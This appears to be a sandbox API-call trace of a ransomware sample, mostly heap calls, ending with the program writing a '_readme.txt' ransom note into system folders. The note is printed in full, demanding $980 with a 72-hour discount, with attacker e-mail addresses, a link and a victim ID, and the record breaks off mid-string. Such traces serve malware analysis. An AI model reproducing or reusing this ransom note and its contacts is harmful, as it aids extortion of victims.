[0183.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.789] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0183.790] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.790] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.790] PathFindFileNameW (pszPath="") returned="" [0183.790] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.790] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.791] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.791] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.792] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0183.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.792] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0183.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.792] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.792] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer 